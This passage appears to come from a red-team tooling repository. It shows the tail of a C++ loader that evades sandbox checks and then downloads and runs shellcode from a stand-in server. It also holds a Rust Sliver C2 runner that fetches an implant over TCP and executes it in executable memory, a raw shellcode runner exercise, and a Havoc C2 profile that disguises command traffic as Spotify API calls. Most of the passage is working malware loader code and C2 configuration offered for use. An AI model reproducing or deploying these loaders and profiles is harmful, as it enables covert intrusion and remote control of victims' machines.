240 | 241 | if (IsSandboxByResolution()) { 242 | std::cout << "Running in a sandbox environment (resolution check).\n"; 243 | return 1; 244 | } 245 | 246 | if (IsSandboxByMouseMovement()) { 247 | std::cout << "Running in a sandbox environment (mouse movement check).\n"; 248 | return 1; 249 | } 250 | 251 | if (IsVirtualDisk()) { 252 | std::cout << "Running in a virtual environment (HDD check).\n"; 253 | return 1; 254 | } 255 | 256 | const char* url = "http://your-server.com/shellcode.bin"; 257 | const char* localPath = "C:\\Windows\\Temp\\shellcode.bin"; 258 | 259 | if (!DownloadFile(url, localPath)) { 260 | std::cerr << "Failed to download file." << std::endl; 261 | return 1; 262 | } 263 | 264 | if (!ExecuteShellcodeFromFile(localPath)) { 265 | std::cerr << "Failed to execute shellcode." << std::endl; 266 | return 1; 267 | } 268 | 269 | return 0; 270 | } 271 | -------------------------------------------------------------------------------- /shellcode-runner-sliverC2.rs: -------------------------------------------------------------------------------- 1 | use std::ptr::null_mut; 2 | use std::net::{Ipv4Addr, SocketAddrV4}; 3 | use std::io::Read; 4 | use winapi::um::memoryapi::VirtualAlloc; 5 | use winapi::um::processthreadsapi::CreateThread; 6 | use winapi::um::synchapi::WaitForSingleObject; 7 | use winapi::um::winnt::{MEM_COMMIT, PAGE_EXECUTE_READWRITE}; 8 | use winapi::shared::minwindef::{DWORD, LPVOID}; 9 | use std::net::TcpStream; 10 | 11 | 12 | // nc -lvp 8080 < FILE_SHELLCODE 13 | const SERVER_IP: &str = "192.168.15.59"; 14 | const SERVER_PORT: u16 = 8080; 15 | 16 | fn download_implant() -> Vec { 17 | let server_addr = SocketAddrV4::new( 18 | SERVER_IP.parse::().expect("Invalid IP address"), 19 | SERVER_PORT, 20 | ); 21 | 22 | println!("Connecting server: {}:{}", SERVER_IP, SERVER_PORT); 23 | 24 | let mut stream = match TcpStream::connect(server_addr) { 25 | Ok(s) => { 26 | println!("Connected server."); 27 | s 28 | } 29 | Err(e) => { 30 | panic!("Failed connect server: {}", e); 31 | } 32 | }; 33 | 34 | let mut buffer = Vec::new(); 35 | match stream.read_to_end(&mut buffer) { 36 | Ok(size) => { 37 | if size == 0 { 38 | panic!("Received empty payload"); 39 | } 40 | println!("Successfully received payload ({} bytes)", size); 41 | } 42 | Err(e) => { 43 | panic!("Failed connect from server: {}", e); 44 | } 45 | }; 46 | 47 | buffer 48 | } 49 | 50 | unsafe extern "system" fn shellcode_runner(param: LPVOID) -> DWORD { 51 | println!("Starting shellcode execution..."); 52 | let func: extern "C" fn() = std::mem::transmute(param); 53 | func(); 54 | println!("Shellcode executed"); 55 | 0 56 | } 57 | 58 | fn main() { 59 | unsafe { 60 | println!("Starting shellcode runner..."); 61 | 62 | // Download the shellcode 63 | let shellcode = download_implant(); 64 | 65 | // Allocate memory for the shellcode 66 | let alloc = VirtualAlloc( 67 | null_mut(), 68 | shellcode.len(), 69 | MEM_COMMIT, 70 | PAGE_EXECUTE_READWRITE, 71 | ); 72 | if alloc.is_null() { 73 | panic!("VirtualAlloc failed"); 74 | } 75 | 76 | println!("Allocated memory at: {:p}", alloc); 77 | 78 | // allocated memory 79 | std::ptr::copy_nonoverlapping(shellcode.as_ptr(), alloc as *mut u8, shellcode.len()); 80 | println!("Shellcode copied to allocated memory"); 81 | 82 | // exece shellcode 83 | let thread_handle = CreateThread( 84 | null_mut(), 85 | 0, 86 | Some(shellcode_runner), 87 | alloc, 88 | 0, 89 | null_mut(), 90 | ); 91 | 92 | if thread_handle.is_null() { 93 | panic!("CreateThread failed"); 94 | } 95 | 96 | println!("Shellcode execution thread created"); 97 | 98 | WaitForSingleObject(thread_handle, winapi::um::winbase::INFINITE); 99 | println!("Shellcode execution complete"); 100 | } 101 | } 102 | -------------------------------------------------------------------------------- /shellcoderunner-exercise-1.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | int main() { 4 | unsigned char shellcode[] = "\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41" 5 | "\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60" 6 | "\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72" 7 | "\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac"; 8 | 9 | void* exec = VirtualAlloc(0, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 10 | 11 | memcpy(exec, shellcode, sizeof(shellcode)); 12 | void(*func)(); 13 | func = (void(*)())exec; 14 | func(); 15 | VirtualFree(exec, 0, MEM_RELEASE); 16 | return 0; 17 | } 18 | -------------------------------------------------------------------------------- /spotify_profile.yaotl: -------------------------------------------------------------------------------- 1 | # HAVOC C2 PROFILE 2 | 3 | Teamserver { 4 | Host = "0.0.0.0" 5 | Port = 40056 6 | 7 | Build { 8 | Compiler64 = "/usr/bin/x86_64-w64-mingw32-gcc" 9 | Compiler86 = "/usr/bin/i686-w64-mingw32-gcc" 10 | Nasm = "/usr/bin/nasm" 11 | } 12 | } 13 | 14 | Operators { 15 | user "5pider" { 16 | Password = "password1234" 17 | } 18 | 19 | user "Neo" { 20 | Password = "password1234" 21 | } 22 | } 23 | 24 | Listeners { 25 | Http { 26 | Name = "spotify profile - http" 27 | Hosts = [ 28 | "api.spotify.com:443", 29 | ] 30 | HostBind = "0.0.0.0" 31 | PortBind = 443 32 | PortConn = 4444 33 | HostRotation = "round-robin" 34 | Secure = false 35 | UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Spotify/1.1.10.540" 36 | Uris = ["/v1/me/player/currently-playing", "/v1/me/player/recently-played"] # URIs utilizadas 37 | Headers = ["Accept: application/json", "Referer: https://open.spotify.com/", "Accept-Encoding: gzip, deflate, br", "Origin: https://open.spotify.com"] 38 | } 39 | } 40 | 41 | Service { 42 | Endpoint = "service-endpoint" 43 | Password = "service-password" 44 | } 45 | 46 | 47 | Demon { 48 | Sleep = 2 49 | Jitter = 20 50 | 51 | TrustXForwardedFor = false 52 | 53 | Injection { 54 | Spawn64 = "C:\\Windows\\System32\\Werfault.exe" 55 | Spawn32 = "C:\\Windows\\SysWOW64\\Werfault.exe" 56 | } 57 | } 58 | --------------------------------------------------------------------------------